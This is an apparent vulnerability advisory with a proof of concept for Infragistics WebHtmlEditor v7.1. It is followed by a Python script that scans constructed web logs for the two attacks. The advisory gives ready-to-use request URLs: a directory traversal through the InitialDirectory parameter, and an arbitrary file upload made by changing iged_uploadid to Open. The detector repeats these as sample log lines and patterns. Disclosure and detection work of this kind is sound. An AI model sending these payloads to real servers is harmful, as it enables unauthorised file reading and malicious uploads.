-----------------------------------------------------------------------------------------------------------------------------
Infragistics WebHtmlEditor v7.1 (InitialDirectory, iged_uploadid) Directory Traversal and Arbitrary File Upload vulnerability
-----------------------------------------------------------------------------------------------------------------------------

proof of concept by KyoungChip, Jang ( SpeeDr00t )

[*] the bug     : directory traversal and arbitrary file upload vulnerability
[*] application : Infragistics WebHtmlEditor v7.1
[*] Vendor URL  : http://www.infragistics.com
[*] homepage    : cafe.naver.com/cwithme
[*] company     : sk юн4sec
[*] Group       : canvasTeam@SpeeDr00t
[*] Thanks to   : my wife (en hee), my son (ju en, do en), Zero-0x77, hoon

# directory traversal vulnerability

A directory traversal vulnerability exists in Infragistics WebHtmlEditor v7.1 which allows a remote user to view files local to the target server. The InitialDirectory parameter (e.g. InitialDirectory=../../) is not validated, so a crafted value walks out of the intended directory.

poc ) InitialDirectory = ../../

ex) http://server/test.aspx?lang=&iged_uploadid=InsertImage&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor

# Arbitrary File upload vulnerability

With iged_uploadid=InsertImage the editor only accepts image files, but an attacker who changes the iged_uploadid parameter to Open can upload arbitrary files.

http://server/test.aspx?lang=&iged_uploadid=Open&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor
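As an added detection example (not part of the advisory and not Infragistics code), the following script scans constructed IIS-style web log lines for the two request patterns described above: an InitialDirectory value that escapes its directory (checked after double URL-decoding, with both slash styles) and an iged_uploadid mode outside an allowlist. The log format and the assumption that InsertImage is the only mode the editor needs are my own.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample log lines (date time method uri-stem uri-query status);
# not taken from any real server.
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /test.aspx lang=&iged_uploadid=InsertImage&LocalizationType=English&InitialDirectory=images&num=1&parentId=WebHtmlEditor 200
2024-01-01 10:00:02 GET /test.aspx lang=&iged_uploadid=InsertImage&LocalizationType=English&InitialDirectory=../../&num=1&parentId=WebHtmlEditor 200
2024-01-01 10:00:03 GET /test.aspx lang=&iged_uploadid=Open&LocalizationType=English&InitialDirectory=%2e%2e%2f%2e%2e%2f&num=1&parentId=WebHtmlEditor 200
2024-01-01 10:00:04 GET /index.aspx - 200
"""

ALLOWED_UPLOAD_MODES = {"InsertImage"}             # assumption: the only mode the editor needs
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # ".." as a whole path component, / or \

def has_traversal(value: str) -> bool:
    """True if the parameter escapes its directory, after (double) URL-decoding."""
    decoded = unquote(unquote(value))
    return bool(TRAVERSAL.search(decoded))

def inspect_request(query: str) -> list[str]:
    """Return the findings for one query string (empty list = nothing suspicious)."""
    params = parse_qs(query, keep_blank_values=True)
    findings = []
    for d in params.get("InitialDirectory", []):
        if has_traversal(d):
            findings.append(f"InitialDirectory traversal: {d!r}")
    for mode in params.get("iged_uploadid", []):
        if mode not in ALLOWED_UPLOAD_MODES:
            findings.append(f"unexpected iged_uploadid mode: {mode!r}")
    return findings

def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Scan log lines; return (timestamp, findings) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        date, time, _method, _stem, query, _status = parts[:6]
        if query == "-":          # request without a query string
            continue
        findings = inspect_request(query)
        if findings:
            hits.append((f"{date} {time}", findings))
    return hits

if __name__ == "__main__":
    for ts, findings in scan_log(SAMPLE_LOG):
        print(ts, "; ".join(findings))
```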